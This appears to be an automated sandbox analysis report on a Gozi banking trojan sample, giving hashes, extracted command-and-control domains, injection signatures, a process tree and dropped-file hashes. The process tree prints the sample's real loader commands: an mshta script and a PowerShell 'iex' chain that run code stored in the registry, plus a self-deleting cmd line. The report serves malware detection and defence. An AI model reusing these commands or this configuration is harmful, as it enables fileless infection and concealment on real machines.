Analysis
-
max time kernel
159s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
07-10-2023 11:19
Static task
static1
Behavioral task
behavioral1
Sample
NEAS.2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40exe_JC.exe
Resource
win7-20230831-en
General
-
Target
NEAS.2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40exe_JC.exe
-
Size
293KB
-
MD5
01435632dca9afc151eec77862bfbc2b
-
SHA1
9bbb4ae83131fafcd14d580810b14f48d2d30837
-
SHA256
2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40
-
SHA512
61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677
-
SSDEEP
3072:28g/bYYX0XH1anZAsaA6eRESzHxHH3zt8l7Mjd1i0ot:DyYa0XUZdaAnEqHxn3R82i0o
Malware Config
Extracted
gozi
Extracted
gozi
5050
mifrutty.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
http://igrovdow.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 4536 set thread context of 2632 4536 powershell.exe Explorer.EXE PID 2632 set thread context of 3704 2632 Explorer.EXE RuntimeBroker.exe PID 2632 set thread context of 3988 2632 Explorer.EXE RuntimeBroker.exe PID 2632 set thread context of 4888 2632 Explorer.EXE RuntimeBroker.exe PID 2632 set thread context of 1384 2632 Explorer.EXE RuntimeBroker.exe PID 2632 set thread context of 3892 2632 Explorer.EXE cmd.exe PID 2632 set thread context of 4740 2632 Explorer.EXE cmd.exe PID 3892 set thread context of 3412 3892 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4596 3872 WerFault.exe NEAS.2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40exe_JC.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 3412 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
NEAS.2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40exe_JC.exepowershell.exeExplorer.EXEpid process 3872 NEAS.2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40exe_JC.exe 3872 NEAS.2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40exe_JC.exe 4536 powershell.exe 4536 powershell.exe 4536 powershell.exe 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2632 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 4536 powershell.exe 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 2632 Explorer.EXE 3892 cmd.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 4536 powershell.exe Token: SeShutdownPrivilege 2632 Explorer.EXE Token: SeCreatePagefilePrivilege 2632 Explorer.EXE Token: SeShutdownPrivilege 2632 Explorer.EXE Token: SeCreatePagefilePrivilege 2632 Explorer.EXE Token: SeShutdownPrivilege 2632 Explorer.EXE Token: SeCreatePagefilePrivilege 2632 Explorer.EXE Token: SeShutdownPrivilege 2632 Explorer.EXE Token: SeCreatePagefilePrivilege 2632 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 2632 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 2632 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 5056 wrote to memory of 4536 5056 mshta.exe powershell.exe PID 5056 wrote to memory of 4536 5056 mshta.exe powershell.exe PID 4536 wrote to memory of 3884 4536 powershell.exe csc.exe PID 4536 wrote to memory of 3884 4536 powershell.exe csc.exe PID 3884 wrote to memory of 4576 3884 csc.exe cvtres.exe PID 3884 wrote to memory of 4576 3884 csc.exe cvtres.exe PID 4536 wrote to memory of 5040 4536 powershell.exe csc.exe PID 4536 wrote to memory of 5040 4536 powershell.exe csc.exe PID 5040 wrote to memory of 1032 5040 csc.exe cvtres.exe PID 5040 wrote to memory of 1032 5040 csc.exe cvtres.exe PID 4536 wrote to memory of 2632 4536 powershell.exe Explorer.EXE PID 4536 wrote to memory of 2632 4536 powershell.exe Explorer.EXE PID 4536 wrote to memory of 2632 4536 powershell.exe Explorer.EXE PID 4536 wrote to memory of 2632 4536 powershell.exe Explorer.EXE PID 2632 wrote to memory of 3704 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 3704 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 3704 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 3704 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 3988 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 3988 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 3988 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 3988 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 4888 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 4888 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 4888 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 4888 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 1384 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 1384 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 1384 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 1384 2632 Explorer.EXE RuntimeBroker.exe PID 2632 wrote to memory of 4740 2632 Explorer.EXE cmd.exe PID 2632 wrote to memory of 4740 2632 Explorer.EXE cmd.exe PID 2632 wrote to memory of 4740 2632 Explorer.EXE cmd.exe PID 2632 wrote to memory of 4740 2632 Explorer.EXE cmd.exe PID 2632 wrote to memory of 3892 2632 Explorer.EXE cmd.exe PID 2632 wrote to memory of 3892 2632 Explorer.EXE cmd.exe PID 2632 wrote to memory of 3892 2632 Explorer.EXE cmd.exe PID 2632 wrote to memory of 3892 2632 Explorer.EXE cmd.exe PID 2632 wrote to memory of 3892 2632 Explorer.EXE cmd.exe PID 2632 wrote to memory of 4740 2632 Explorer.EXE cmd.exe PID 2632 wrote to memory of 4740 2632 Explorer.EXE cmd.exe PID 3892 wrote to memory of 3412 3892 cmd.exe PING.EXE PID 3892 wrote to memory of 3412 3892 cmd.exe PING.EXE PID 3892 wrote to memory of 3412 3892 cmd.exe PING.EXE PID 3892 wrote to memory of 3412 3892 cmd.exe PING.EXE PID 3892 wrote to memory of 3412 3892 cmd.exe PING.EXE
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\NEAS.2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40exe_JC.exe"C:\Users\Admin\AppData\Local\Temp\NEAS.2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40exe_JC.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 13883⤵
- Program crash
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djd9='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djd9).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9\\\ActiveStart'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name apwyhd -value gp; new-alias -name mxbnxjpat -value iex; mxbnxjpat ([System.Text.Encoding]::ASCII.GetString((apwyhd "HKCU:Software\AppDataLow\Software\Microsoft\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9").ClassFile))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\smib5sbp\smib5sbp.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4253.tmp" "c:\Users\Admin\AppData\Local\Temp\smib5sbp\CSCE9683CF9BB8A409FB339C139FB31C9F7.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c4rnyliw\c4rnyliw.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4A33.tmp" "c:\Users\Admin\AppData\Local\Temp\c4rnyliw\CSC711D038B991448B785FF91D8FC446BE7.TMP"5⤵
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\NEAS.2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40exe_JC.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3872 -ip 38721⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES4253.tmpFilesize
1KB
MD54d8658f67dec7b4a203d33711ffdc63e
SHA110f2c877e190bee90b9a6e37a01ad7ce014ed49c
SHA2565d32e6690aa649ab3342589139d6359563944812898189eb4788cc8bb286172e
SHA5128a3b59df5bca5959a3eac130f9824a3913b82730abbc77fd3bcbd160121f3283aa31a03d03edc9e875aa8f94c7c4c37c705a23e6e47d7c5abca2c96e924c3ed7
-
C:\Users\Admin\AppData\Local\Temp\RES4A33.tmpFilesize
1KB
MD571179805a999c8a94c311a9f55558311
SHA14500a6c89b319b1e5fb81b1cc5d4dfff7822914b
SHA256ec4f8b51e1ec78be2018b4984d7bbcf1f44e40a76bbbeb964407f8f8e57c4f69
SHA512823807304f15656fe23c8155e86e718e293caadd4140e8255b316019c22bac649a39ff731c141151689fe23db439692cfe68c2a241ff85beeb00b9a95afb1d99
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izh5dn3d.2fs.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\c4rnyliw\c4rnyliw.dllFilesize
3KB
MD5dd83ac69c02e83dd4dbc839391a4fb28
SHA1b11cd44b23c785cb30db08110bcb1e19e0daaf8d
SHA256d72561911547f4e47ba98d4d0786042cedae58d87013177bcfda301bfd639b24
SHA512b9875f7af9821e35f25d3be9bfdc5f5cb8e35df734810666f5bd2f06b086d5c67391ecd9712f85453e94d3094abd78e78ea2359aaad989d0d1073a52d9410178
-
C:\Users\Admin\AppData\Local\Temp\smib5sbp\smib5sbp.dllFilesize
3KB
MD5b2a7ed93b2af0c01dda585e17d4e77ca
SHA1c762009dee70331139cc47f6ef6b09349755ddff
SHA256da40ad503cc256444000d8309347d7e37eb496a29211e934283b28d0d77027ed
SHA51220648c04d440574aab2193f5065b794898dc449259002f66768fe6c23b879a4d46bfdbc72978ed3d9532b2f897ab296c788797de3bab7d48bdd4ea622a181a0b
-
\??\c:\Users\Admin\AppData\Local\Temp\c4rnyliw\CSC711D038B991448B785FF91D8FC446BE7.TMPFilesize
652B
MD5ed5c85974623ec6df521b39522cb7cd2
SHA183587fddf9843d372a09b4b9c1fcf464f27234f8
SHA256f1c907fdbb82e2251cb95671c01c985bdf2c02085a59cbe742e973c20979de3a
SHA512a3cd0812a4b9d3f481793f7a41989be92a3aec6f9a33dba61aa0788e35f87d851407f34f8547aff09599607fa4ed37f6ba6f3dad6017c6cd995db2bc79cf1f95
-
\??\c:\Users\Admin\AppData\Local\Temp\c4rnyliw\c4rnyliw.0.csFilesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
\??\c:\Users\Admin\AppData\Local\Temp\c4rnyliw\c4rnyliw.cmdlineFilesize
369B
MD57245bcf0c6df6d373760a7ad8ddee99c
SHA1863778c2a2fafe97c00d9d407020200bbd013071
SHA256a9f825e1aa2a69ffc07cc32523f905ddaa61b28494808a03e7d5dca4f2a6e11c
SHA51213bdfdd593a9585c510e496ba6b0b0b36f9f033455a3fad4463ff9b93660881d55628f40aaa09480b5261e23307621f613fa969c3ebb379887b6ea0db3dc2b08
-
\??\c:\Users\Admin\AppData\Local\Temp\smib5sbp\CSCE9683CF9BB8A409FB339C139FB31C9F7.TMPFilesize
652B
MD544abf240b2a1baad1c10443ff5b041de
SHA19232deeb513cef4b50a90eef9e83dad68201695f
SHA2561ce126bce37a7849001e437a46d59c5dfd4f0392203fbd2c901466c567595192
SHA5124451ff11fc72f6b331dddc27bc696e00733538372c4e5397e6bbdd203e0c13ec7921cf18115beea1aaa791c731745e10232cbacf64968da9f914b646489dd904
-
\??\c:\Users\Admin\AppData\Local\Temp\smib5sbp\smib5sbp.0.csFilesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
\??\c:\Users\Admin\AppData\Local\Temp\smib5sbp\smib5sbp.cmdlineFilesize
369B
MD5fad48d440fa52abe27fd7686e15ffc59
SHA16090763a01fbc203b2ba9129f52f7d7061119e7c
SHA256a446187560b13ead6fd6221e9bb4cc18241fedc4ae3d7af2859bf8a10f2579d2
SHA512db8766b407f941c8cd27e3d6d7e3d2e37c3b640b62660366a086d753f8277ffc119e9d33ead3b72dd76b456fa1cfd511db460ec95bbcde8e62dc1327b3bb450b
-
memory/1384-87-0x000001C840B40000-0x000001C840BE4000-memory.dmpFilesize
656KB
-
memory/1384-88-0x000001C8406B0000-0x000001C8406B1000-memory.dmpFilesize
4KB
-
memory/1384-115-0x000001C840B40000-0x000001C840BE4000-memory.dmpFilesize
656KB
-
memory/2632-58-0x0000000002220000-0x0000000002221000-memory.dmpFilesize
4KB
-
memory/2632-95-0x0000000008710000-0x00000000087B4000-memory.dmpFilesize
656KB
-
memory/2632-55-0x0000000008710000-0x00000000087B4000-memory.dmpFilesize
656KB
-
memory/3412-109-0x000001B9960C0000-0x000001B9960C1000-memory.dmpFilesize
4KB
-
memory/3412-116-0x000001B996120000-0x000001B9961C4000-memory.dmpFilesize
656KB
-
memory/3412-106-0x000001B996120000-0x000001B9961C4000-memory.dmpFilesize
656KB
-
memory/3704-107-0x0000021333600000-0x00000213336A4000-memory.dmpFilesize
656KB
-
memory/3704-69-0x0000021333600000-0x00000213336A4000-memory.dmpFilesize
656KB
-
memory/3704-70-0x0000021330D60000-0x0000021330D61000-memory.dmpFilesize
4KB
-
memory/3872-7-0x0000000000400000-0x000000000228F000-memory.dmpFilesize
30.6MB
-
memory/3872-8-0x00000000022A0000-0x00000000023A0000-memory.dmpFilesize
1024KB
-
memory/3872-4-0x0000000003EB0000-0x0000000003EBD000-memory.dmpFilesize
52KB
-
memory/3872-2-0x0000000000400000-0x000000000228F000-memory.dmpFilesize
30.6MB
-
memory/3872-1-0x00000000022A0000-0x00000000023A0000-memory.dmpFilesize
1024KB
-
memory/3872-3-0x0000000003E90000-0x0000000003E9B000-memory.dmpFilesize
44KB
-
memory/3892-117-0x000001FC80FA0000-0x000001FC81044000-memory.dmpFilesize
656KB
-
memory/3892-98-0x000001FC80E70000-0x000001FC80E71000-memory.dmpFilesize
4KB
-
memory/3892-94-0x000001FC80FA0000-0x000001FC81044000-memory.dmpFilesize
656KB
-
memory/3988-76-0x0000028FD4980000-0x0000028FD4981000-memory.dmpFilesize
4KB
-
memory/3988-75-0x0000028FD49C0000-0x0000028FD4A64000-memory.dmpFilesize
656KB
-
memory/3988-112-0x0000028FD49C0000-0x0000028FD4A64000-memory.dmpFilesize
656KB
-
memory/4536-21-0x000001DCBBCC0000-0x000001DCBBCE2000-memory.dmpFilesize
136KB
-
memory/4536-37-0x000001DCBBD20000-0x000001DCBBD28000-memory.dmpFilesize
32KB
-
memory/4536-24-0x000001DCBB990000-0x000001DCBB9A0000-memory.dmpFilesize
64KB
-
memory/4536-23-0x000001DCBB990000-0x000001DCBB9A0000-memory.dmpFilesize
64KB
-
memory/4536-22-0x00007FFB513A0000-0x00007FFB51E61000-memory.dmpFilesize
10.8MB
-
memory/4536-67-0x00007FFB513A0000-0x00007FFB51E61000-memory.dmpFilesize
10.8MB
-
memory/4536-61-0x00007FFB513A0000-0x00007FFB51E61000-memory.dmpFilesize
10.8MB
-
memory/4536-56-0x000001DCBBD50000-0x000001DCBBD8D000-memory.dmpFilesize
244KB
-
memory/4536-51-0x000001DCBBD40000-0x000001DCBBD48000-memory.dmpFilesize
32KB
-
memory/4740-96-0x0000000001440000-0x00000000014D8000-memory.dmpFilesize
608KB
-
memory/4740-104-0x0000000001440000-0x00000000014D8000-memory.dmpFilesize
608KB
-
memory/4740-101-0x0000000000DD0000-0x0000000000DD1000-memory.dmpFilesize
4KB
-
memory/4888-114-0x0000028890440000-0x00000288904E4000-memory.dmpFilesize
656KB
-
memory/4888-81-0x0000028890440000-0x00000288904E4000-memory.dmpFilesize
656KB
-
memory/4888-82-0x000002888FBE0000-0x000002888FBE1000-memory.dmpFilesize
4KB